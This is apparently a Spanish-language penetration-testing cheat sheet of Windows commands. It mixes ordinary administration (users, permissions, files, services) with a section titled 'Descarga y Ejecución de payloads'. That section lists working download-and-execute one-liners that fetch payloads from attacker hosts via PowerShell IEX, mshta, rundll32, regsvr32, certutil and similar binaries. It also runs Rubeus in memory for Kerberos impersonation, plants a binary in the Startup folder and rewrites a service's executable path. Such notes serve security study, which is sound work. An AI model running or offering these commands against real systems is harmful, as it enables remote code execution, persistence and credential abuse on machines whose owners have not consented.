Inténtalo Más Duro
WEB
Buscar
⌃K
Links

Windows General

Gestión de Usuarios

Crear nuevo usuario y añadirlo al grupo 'admin'

net user $USERNAME $PASSWORD /add ; net localgroup administrators $USERNAME /add

Crear nuevo grupo

New-LocalGroup -Name "HR"

Gestión de archivos y directorios

Descarga mediante SMB

# Crear server SMB en la máquina atacante
### POWERSHELL en la máquina objetivo ###
# Conectarse a un SMB
net use \\$RHOST\$SERVERNAME /user:$USERNAME $PASSWORD
# Transferir archivo desde local a remoto
Copy-Item .\$FILE \\$RHOST\$SERVERNAME
# Comprobar SMBs conectados
Get-SmbConnection

Descarga desde una URL

Invoke-WebRequest -OutFile $FILEOUTPUT -Uri $URL

Permisos

# https://ss64.com/nt/icacls.html
# Ver permisos
icacls $FILE
# Dar permisos (full control, pero no recursivos)
icacls c:\Users /grant joe:f
# Quitar permisos
icacls c:\Users /remove joe
# Leyenda
(CI): container inherit
(OI): object inherit
(IO): inherit only
(NP): do not propagate inherit
(I): permission inherited from parent container
----
F : full access
D :  delete access
N :  no access
M :  modify access
RX :read and execute access
R :  read-only access
W :  write-only access

Manipulación, listado y creación

dir / a # List directory including hidden files
dir * .$EXTENSION # List any file extension"
mkdir # Make directory
rmdir /s # Remove directory and contents
wmic logicaldisk get name # List all drives
$DRIVE: # S witch drive
tree # Folder structure
attr i b # File attributes
attr i b +h $FILE # Add file attributes
attr i b -h $FILE # Remove file attributes
echo hello > $FILE # Create file on the fly
type $FILE # Read contents of a file
del $FILE # Delete file
echo hello > $FILE # Overwrite file text (1. file.txt = "hello")
echo world > $FILE # Overwrite file text (2. file.txt = "world")
echo hello > $FILE # Append to a file (1. file.txt = "hello")
echo world >> $FILE # Append to a file (2. file.txt = "hello world")
dir > $FILE # Command results to file
copy $FILE copy/here # Copy a file to a directory
xcop y $DIR1 $DIR2 # Copy contents from folder1 to folder2 (no sub-directories)
xcop y $DIR1 $DIR2 /s # Copy contents from folder1 to folder2 (inc sub-directories)
move $DIR1 $DIR2 # Move a directory, folder1 into folder2
rename $DIR_OLD $DIR_NEW # Rename a directory

Misc

cls # Clear CMD
command /? # Show help/options for a command
Type file name in directory # open file in default program
path # Show environment path
color /? # List all available colours
color 0A # Change colours
color # Default colours

Administración de discos

Administrar discos con Fdisk

# Entrar en fdisk
fdisk.exe
# listar discos disponibles
> list disk
# seleccionar disco con el que queremos operar
> select disk 6
# listar particiones disponibles del disco
> list partition
# Borrar partición seleccionada
> delete partition override

Servicios

Obtener Servicios

# Powershell
Get-Service | ? {$_.Status -eq "Running"} | select -First 2 | fl
# CMD
sc qc $SERVICE

Iniciar/Parar Servicios

# CMD
sc [stop/start/restart] $SERVICE

Cambiar el ejecutable de un servicio

sc config $SERVICE binPath:$PATH_DEL_EJECUTABLE

Ver permisos de un Servicio

# Powershell
Get-ACL -Path HKLM:\System\CurrentControlSet\Services\wuauserv | Format-List
# CMD
sc sdshow $SERVICE

Descarga y Ejecución de payloads

Powershell

Desde un servidor HTTP

# V1 (FUNCIONA)
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.139:8000/power.ps1')"
# V2 (A VECES NO FUNCIONA)
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
# Download only
(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/PowerUp.ps1", "C:\Windows\Temp\PowerUp.ps1")
Invoke-WebRequest "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe"
# Download and run Rubeus, with arguments
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Rubeus.Program]::Main("s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split())
# Execute a specific method from an assembly
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/lib.dll')
$assem = [System.Reflection.Assembly]::Load($data)
$class = $assem.GetType("ClassLibrary1.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)

Desde un servidor Webdav

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

CMD

cmd.exe /k < \\webdavserver\folder\batchfile.txt

Cscript / Wscript

cscript //E:jscript \\webdavserver\folder\payload.txt

Mshta

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
mshta http://webserver/payload.hta
mshta \\webdavserver\folder\payload.hta

Rundll32

rundll32 \\webdavserver\folder\payload.dll,entrypoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Regasm / Regsvc

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Regsvr32

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Odbcconf

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Certutil

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

Bitsadmin

bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
Sistemas - Anterior
Windows
Próximo
Windows Priv-Esc
Última actualización 1yr ago